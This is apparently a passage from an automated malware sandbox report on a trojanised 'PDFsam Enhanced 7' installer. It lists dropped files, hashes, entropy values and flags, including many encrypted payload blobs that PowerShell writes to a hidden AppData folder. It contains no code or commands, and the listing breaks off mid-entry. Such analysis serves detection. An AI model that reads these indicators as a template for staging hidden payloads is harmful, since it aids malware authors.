                                                                                                    Preview: Log file created at: 2021/10/04 21:28:18..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..I1004 21:28:18.016358 6476 Updater.cpp:186] IsNewVersionAvailable begin..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\ProgramData\PDFsam Enhanced 7\Installation\logs\log.WARNING.20211004-212849.616
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):170
                                                                                                    Entropy (8bit):5.014395426216142
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:2J9btYQMfDFJSEsE1DLrrFJHIWCyRVB2NfWTTwFFT0Jgy5ziaXy:krMmE1f1JHIWC02NcMFptgzzXy
                                                                                                    MD5:3748FEAE1468A3AE61F1C3D0BC223C76
                                                                                                    SHA1:D0A3519079C2F7F1E9D4A39375C4F1961C655022
                                                                                                    SHA-256:F38402313D72F648AA2DFEFF9DA07DD3EB430B3AB61A44AC0CDF22FA62F730CE
                                                                                                    SHA-512:76D3448797F02EC0D8732525FBC8B19413117CA3FC9D6B39261E3D29E97F20CC71101182DF3DC39F14F4EA9E3E3DCF8E6A7A873DB96F06A915447DD76E71AAE8
                                                                                                    Malicious:false
                                                                                                    Preview: Log file created at: 2021/10/04 21:28:49..Log line format: [IWEF]mmdd hh:mm:ss.uuuuuu threadid file:line] msg..E1004 21:28:49.666409 6476 Updater.cpp:270] unknow error..
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:Microsoft Cabinet archive data, 61157 bytes, 1 file
                                                                                                    Category:dropped
                                                                                                    Size (bytes):61157
                                                                                                    Entropy (8bit):7.995991509218449
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:ppUkcaDREfLNPj1tHqn+ZQgYXAMxCbG0Ra0HMSAKMgAAaE1k:7UXaDR0NPj1Vi++xQFa07sTgAQ1k
                                                                                                    MD5:AB5C36D10261C173C5896F3478CDC6B7
                                                                                                    SHA1:87AC53810AD125663519E944BC87DED3979CBEE4
                                                                                                    SHA-256:F8E90FB0557FE49D7702CFB506312AC0B24C97802F9C782696DB6D47F434E8E9
                                                                                                    SHA-512:E83E4EAE44E7A9CBCD267DBFC25A7F4F68B50591E3BBE267324B1F813C9220D565B284994DED5F7D2D371D50E1EBFA647176EC8DE9716F754C6B5785C6E897FA
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506
                                                                                                    Process:C:\Users\user\AppData\Roaming\PDFsamEnhanced7Installer.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):326
                                                                                                    Entropy (8bit):3.1084234392766255
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:kKIdFN+SkQlPlEGYRMY9z+4KlDA3RUeOlEfcTt:i2kPlE99SNxAhUefit
                                                                                                    MD5:1580A2C317BEF4F22BB5335802E96576
                                                                                                    SHA1:AD34F28950F3593A4FB049C85F2DF9DDBFF831E2
                                                                                                    SHA-256:0C2097846B792E56E8299B018F29047B7FCFC577337C96ABEBD220DD4D425396
                                                                                                    SHA-512:1DD7DF27B6BAC152B7957D1CB3D285573D8DF2D554E23C5D7E9ECBFC5331262A9DB7F7CBC2C85BE90A7059BA4DFDF93C1DF48574E5DA35AB57CF8DAC5EFE9B71
                                                                                                    Malicious:false
                                                                                                    Preview: p...... ............V...(....................................................... ...........^.......$...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".0.a.a.8.a.1.5.e.a.6.d.7.1.:.0."...
                                                                                                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):11606
                                                                                                    Entropy (8bit):4.8910535897909355
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:Dxoe5IpObxoe5lib4LVsm5emdYVFn3eGOVpN6K3bkkjo5UgkjDt4iWN3yBGHc9so:Wwib4LEVoGIpN6KQkj2jkjh4iUxm44Q2
                                                                                                    MD5:7A57D8959BFD0B97B364F902ACD60F90
                                                                                                    SHA1:7033B83A6B8A6C05158BC2AD220D70F3E6F74C8F
                                                                                                    SHA-256:47B441C2714A78F9CFDCB7E85A4DE77042B19A8C4FA561F435471B474B57A4C2
                                                                                                    SHA-512:83D8717841E22BB5CB2E0924E5162CF5F51643DFBE9EE88F524E7A81B8A4B2F770ED7BFE4355866AFB106C499AB7CD210FA3642B0424813EB03BB68715E650CC
                                                                                                    Malicious:false
                                                                                                    Preview: PSMODULECACHE.............S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script..........Y.....C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI29D3.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    Preview: MZ......................@...................................(...........!..L.!This program cannot be run in DOS mode....$........q).I.G.I.G.I.G.....C.G.......G.....P.G....K.G.B.C.F.G.B.D.@.G.B.B...G...O.G...H.G...V.G.I.F.h.G...N...G...G.H.G.....H.G.I..H.G...E.H.G.RichI.G.................PE..d.....Ma.........." .........&......\.....................................................`..........................................Z..t...da..,....P.. ........P.......5...`...... w..............................@w..0............ ...............................text...4........................... ..`.rdata..\^... ...`..................@..@.data...pQ.......*...p..............@....pdata...P.......R..................@..@_RDATA.......@......................@..@.rsrc... ....P......................@..@.reloc.......`......................@..B................................................................................................................................................................
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI35C.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI5DE.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Users\user\AppData\Local\Temp\MSI60E.tmp
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                    Category:dropped
                                                                                                    Size (bytes):869280
                                                                                                    Entropy (8bit):6.3414241157809705
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12288:nLwYx/g1HctfkBROlxhlPre+G9EvE2lkByWl7DoTGCdH9rT:nLwqsBcLDe+u2lkEWl7DCGCfX
                                                                                                    MD5:8636E27B4E9FE2E7D4EF7F77FE3BA1D2
                                                                                                    SHA1:F1C7C604AD423AE6885A4DF033440056A937E9C2
                                                                                                    SHA-256:5080AB5F709A25411F372C9D9D4FBCEDB95D6A39334533815AB4EB975A43C74C
                                                                                                    SHA-512:DC509D0D1D279380B0C7B44DFC45D22D4EA22188672ADD296BDE316EFB4D7A7E0942944E072920DF029E6F47FA6F251147179D67A5D747172FA2C3482208CD2E
                                                                                                    Malicious:false
                                                                                                    Antivirus:
                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_onmw5wn5.cah.psm1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rssalrkl.qll.ps1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xxls3dep.5w5.ps1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y0t0xluz.4b0.psm1
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:very short file (no magic)
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1
                                                                                                    Entropy (8bit):0.0
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:U:U
                                                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                                                    Malicious:false
                                                                                                    Preview: 1
                                                                                                    C:\Users\user\AppData\Local\Temp\a679308d-6b35-479b-82d4-9854e6a65464\Repository.ini
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):207
                                                                                                    Entropy (8bit):5.490504963280286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:lXn9VoHQ8V31u6lJjl7bTqFRmxKytH/PB:RnbR8V3ZFljJPD
                                                                                                    MD5:90425674B41DE842D086FBD29CB20B4B
                                                                                                    SHA1:3EA07C4057AE2CB793F3CF68DA13D384818D199A
                                                                                                    SHA-256:C4065B319FC26BAE8167E75DC4BA9A229D805D550284FDDBE645585FF73D2E93
                                                                                                    SHA-512:1081AD897898AE7ABFC9F680D9EEE8109BBDA820C8610648FD57C21AA0390318D7648D245B7A9928D5055DE858368C9B1390969A7E6BDCCBCBA347AC8ECFEA35
                                                                                                    Malicious:false
                                                                                                    Preview: [OSInfo]..Win64=True..SuiteMask=256..Type=1..Major=10..Minior=0..Build=17134..[ProductInfo]..ProductName=(EMCO EVALUATION PACKAGE) - V2..ProductCode={92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..Manufacturer=LTD..
                                                                                                    C:\Users\user\AppData\Local\Temp\cad754e2-de01-4850-9beb-b967743c5645\Repository.ini
                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):207
                                                                                                    Entropy (8bit):5.490504963280286
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:lXn9VoHQ8V31u6lJjl7bTqFRmxKytH/PB:RnbR8V3ZFljJPD
                                                                                                    MD5:90425674B41DE842D086FBD29CB20B4B
                                                                                                    SHA1:3EA07C4057AE2CB793F3CF68DA13D384818D199A
                                                                                                    SHA-256:C4065B319FC26BAE8167E75DC4BA9A229D805D550284FDDBE645585FF73D2E93
                                                                                                    SHA-512:1081AD897898AE7ABFC9F680D9EEE8109BBDA820C8610648FD57C21AA0390318D7648D245B7A9928D5055DE858368C9B1390969A7E6BDCCBCBA347AC8ECFEA35
                                                                                                    Malicious:false
                                                                                                    Preview: [OSInfo]..Win64=True..SuiteMask=256..Type=1..Major=10..Minior=0..Build=17134..[ProductInfo]..ProductName=(EMCO EVALUATION PACKAGE) - V2..ProductCode={92DEF4EC-9A2A-492B-8CB2-EA5C3D67E621}..Manufacturer=LTD..
                                                                                                    C:\Users\user\AppData\Roaming\2WftOkjH2DTINpykLmMi2XBT65qk2NHPEPmp1ey8nolySJLrPHIgKlV41rr3Lgbv6SIiqgwF8WZn6CM6Yp2i9SpL59VEvZ9wljFHAhxgOT4YyYwTEx.bWtueHR+A318cQ==
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114
                                                                                                    Entropy (8bit):5.482772444004787
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:zOtKVhgnBOcI+AxS2vp3694W9soSjwDq2RSEBxsh:GKAnXI+aFv52soQwDqQgh
                                                                                                    MD5:425EEA521EF26B88E4B4BB7B1FF7DFF9
                                                                                                    SHA1:6B370805E669A8254BEA5DE4B61923559EB92AD8
                                                                                                    SHA-256:81BC903B6B00E9BC9EB19D255307CD958C5364FBF452EC26EDEE44343CB2219A
                                                                                                    SHA-512:0407EC7D5C09DCD544F43B589F6DD1FDB455058D6C65B096E513009B1FCF4F927D76644473FCD8A990C7209D48E4BB901AC8557639A1ED21A21430BDD1358F68
                                                                                                    Malicious:false
                                                                                                    Preview: 2WftOkjH2DTINpykLmMi2XBT65qk2NHPEPmp1ey8nolySJLrPHIgKlV41rr3Lgbv6SIiqgwF8WZn6CM6Yp2i9SpL59VEvZ9wljFHAhxgOT4YyYwTEx
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ACDSRYjHaJFqblvp.QmpEytPRainlJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):121685
                                                                                                    Entropy (8bit):7.998215175249978
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:fCksbePqeHuGrbNP6Zy9bkS35FraG8yHDVUkT6W51b:KEqeHuEbN6Ybh3jrQ8zT6+1b
                                                                                                    MD5:70DF42634084EBB4816060CECFF6A22E
                                                                                                    SHA1:6F776B9236C4BA3A2FF2B22C85629BD0DF298C12
                                                                                                    SHA-256:4461ECED229C6CCF66CAC33632805021EA64520030CEF27A7D6F265245861C1E
                                                                                                    SHA-512:A2EA3E3DA0FC9986076742D3334F9C24FF43D3B4F282834F847D2D5FA1FFD89F57BEF3C16197F360D875B96DD2E4538622A727B928860A069876543E36246FA8
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AEUqJVPnvMdHG.jhaPgeFzLwZTGcsA
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):113635
                                                                                                    Entropy (8bit):7.9980894764652755
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:LLKAdKwLhp6lKb3BYUMTbClHxscHXg0SqfbfL3cORvgAHV7s:LLnlLnhBYxTXOxLhgAps
                                                                                                    MD5:8F2EB3A57E5DC6500B5DEAB5C7CF292C
                                                                                                    SHA1:6107FC078BACC1D70DA57095D529ACA944446F51
                                                                                                    SHA-256:5FDA0B77ABC880866F3E86C54E2C1F66B6FEEEBA7DE938861372BDCD7D725C49
                                                                                                    SHA-512:6165A681EB738F41B035EB0E35EA150D5BB23E4DA7FA558EE54C8F0142A46579256DAB22C0C8ADC86663BF918A5E363EBAA41BB69A1DA9C3EC11103A004D25A5
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AGLbdnliVrfmDtxBhzv.uOqxCwYEIdphnH
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):58550
                                                                                                    Entropy (8bit):7.996523857172434
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:gMC/Ty7fOspCBlBafnb5ND3TsKFwbTL/p:4Ol5NzTsqgTLh
                                                                                                    MD5:CCFF9A7C5EF55E714743474327AB42F6
                                                                                                    SHA1:6D2BFC69B5D5B9F3A58EDB4282EF915EAC6431E5
                                                                                                    SHA-256:5D2A53FFB63BFEA03A5D18A1E617E0FCD38DBF953CC449A7526BB7CCC2B929CC
                                                                                                    SHA-512:52A4A1B955B7FA48DA6293924A611A4CA38ED1D019B97C039248B744E99843840DCE6868A8FCE2449EE538E402DE3DE14274DCC2940C33736603B1AD1A1A59CD
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AIMcfPgWhH.HYLqKIlefgPpWDaGCN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):166447
                                                                                                    Entropy (8bit):7.998986603330671
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:EqYXheGkYwdyVfEvQr0IAtinnn2xjHGQx9k5TAMce5qvI3KxotD5+t2QWjS8ME+U:EqmAdGfWQwIAs2xPkae5qKcg1+sjSBEj
                                                                                                    MD5:D379BDC3C640A56828838E674307E57D
                                                                                                    SHA1:D13D6EFA8DF2C8856C4703AD5EFAFBE7FF1721F1
                                                                                                    SHA-256:1E97BF13EEAB98C89164804A6B656A99C9905C70EB1DAD88581F790162C0B745
                                                                                                    SHA-512:69F8C5557828748EB86BE40AEEEE1871C8DBD52A552D94D8EE615E01193F6ACCD7F6B8161A5C028CBD3553336ADA4C1F8BFB4CAE93852C45811BDE830B87A782
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AOaZlcBEzKNnt.NWOhyYopIwtxs
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):143526
                                                                                                    Entropy (8bit):7.998537012032547
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BHEPIYuxWHlM095TXNT84DJYiUq5cwFNeHC4zmmTPb+I/s:FEPI5xWHJ9xXCw5cMsHC4zHTPb+I/s
                                                                                                    MD5:F2A59C05DBF4EA33A9276EC7819F62F8
                                                                                                    SHA1:DAAF6B49FF7238F088ADDFA92CC4789FB6A10D94
                                                                                                    SHA-256:76278EDA7BB38E85BA45EA500F1B4C5E727757BB4052CA2A605D7FF12B3D2D4C
                                                                                                    SHA-512:BD819F8DDA5E914ADB06E4C4F2D554595E0A11A9A8C2BBC880618EC1D7C184A2B52725A8CEC0B8D533B4CA91998AC5E241F800434FBC025616557CEC8A60A16E
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\ARPWhfQocinEXVCa.DcNgqetOiJ
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):89377
                                                                                                    Entropy (8bit):7.998346118330625
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:1536:95cxxX4eOVw1Hbxl71DXs601By8QBNC8xFMDFGCq8m1:g74JVwpZs6iQ8QXfeGom1
                                                                                                    MD5:9EB0CE1F4FBA378A6A7E1A36F5D97B9D
                                                                                                    SHA1:68772056BA52F1DB9D5FA55AA6EF0A1FA8AFD09B
                                                                                                    SHA-256:84B97F9937374BB9258210A261E0F3433041102877536A944E1E85A3F4355AC9
                                                                                                    SHA-512:3F8A61919ADFDA441A1070622BB22FABDD34057F79E601F4946A42A7AE564EE8296E51EC25BF5FE1431C2613520274A2CF52F1CE62B005A4ECAED0AA5C5642B2
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AWuIpnSbxmefzZ.iOLQcEGMqBSXN
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):124750
                                                                                                    Entropy (8bit):7.99831789391062
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:BKSiYPB6lzUysCqWVWE1E65ZIg4lrZOKa:QlC6lzHsCqKjm6L2lrZOKa
                                                                                                    MD5:95D34A763AB2CE4F3FD0C33915628000
                                                                                                    SHA1:3D21BCE64B5FA85A3D93F4290076F00D11577883
                                                                                                    SHA-256:0DC7D157204DCE10543C864CF269FBA0A81DB6F2FE5522EDBBCACF0DAF9BA9A5
                                                                                                    SHA-512:FDEA4516B1EB516E240FA8C42B784AAFBE52F82DD07E777E8131CEDA9272E386F694B58E2DA1D2773307C7AFBBB515401F94747A3406D8C23C55951588021FA7
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AYQMbHDVCoyzOhLndP.ZCDMOyWhbvklRHpF
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):174505
                                                                                                    Entropy (8bit):7.998838250131159
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:T9r1c6R0NwxBlZCwEmjoj9mbA1De/rGfARAVfaK6w4AP6lKa:T9JN2wx4wEmjXbAMRAVfJ6B3Ka
                                                                                                    MD5:F2219461AE638DBD3AE2DD789ADFEC66
                                                                                                    SHA1:C747802AB2952727EE5E78386BA6E63F9C13ACAB
                                                                                                    SHA-256:377A8218759E05F7183BCEC90A7E7B8BAD1FAE9D7160634A955B5DB5463D5886
                                                                                                    SHA-512:C280685D592B9146EEFC4CBF74C21A481D2759CC3977332E17BAECCDB798E15E96AA289EE9924CE5BE7B8A5AD9FD9E55B850C3FFF5F1431B82DD6D8911E65264
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmBuKsoidaTwgDcFe.QlMTbxijnHFgmJYK
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):101819
                                                                                                    Entropy (8bit):7.998211739295481
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:CIeu/3v94Fx3zPBzoe4S7GUqdLXso/Sof:t5316x3FzvUl8of
                                                                                                    MD5:228DD0E69680D0DA6DB29D3756D685ED
                                                                                                    SHA1:089F01E69B25E7B83976150536CD8BFB93C54238
                                                                                                    SHA-256:A310AD31A27A0032A94B19CAED8D861F7416447C9268140D5E362B496FCA575F
                                                                                                    SHA-512:DFF8884A4849D017C9AAC5E5278D58133C1C4022400C57F80026F7415D8EFAFF911403B7BA7E95813B60725129FC58C5CBB55FB5A1F85DB3A51BACF1E2156809
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AmuPvBJXSECTxI.BTSKVizGswAe
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):114134
                                                                                                    Entropy (8bit):7.998241565146813
                                                                                                    Encrypted:true
                                                                                                    SSDEEP:3072:E1GLZ140QlRnisVMAXRvBkEFhLsxma0JOa6rmopDaJ/V7+nLq0+q:DZ140QrtMAVBlhLsUa0JADaJtgLqY
                                                                                                    MD5:3664B09DFFBF2A1358A38D34F3A669F1
                                                                                                    SHA1:176F87F27B6392BF06AF6E4B276F488B5B6D6B39
                                                                                                    SHA-256:D72BCEF17DB8E3CE6EA6696DBCC83A932ECAA55192AA10C8415FD3A359EE22F0
                                                                                                    SHA-512:0AD4452FDF76A1B11E449AC887DE1834443FCCA46E601210941C43BB5D557DB022694D3CEC8E1B91EA4146111DBB0FA2E7BBEE031EA6B8E3996DA73730A660BF
                                                                                                    Malicious:true
                                                                                                    C:\Users\user\AppData\Roaming\Microsoft\UkpPOYBgmRz\AxjvQIoklqwZJTBFcb.tesRTCpyOzdQx
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):78856
                                                                                                    Entropy (8bit):7.997452921999763
                                                                                                    Encrypted:true
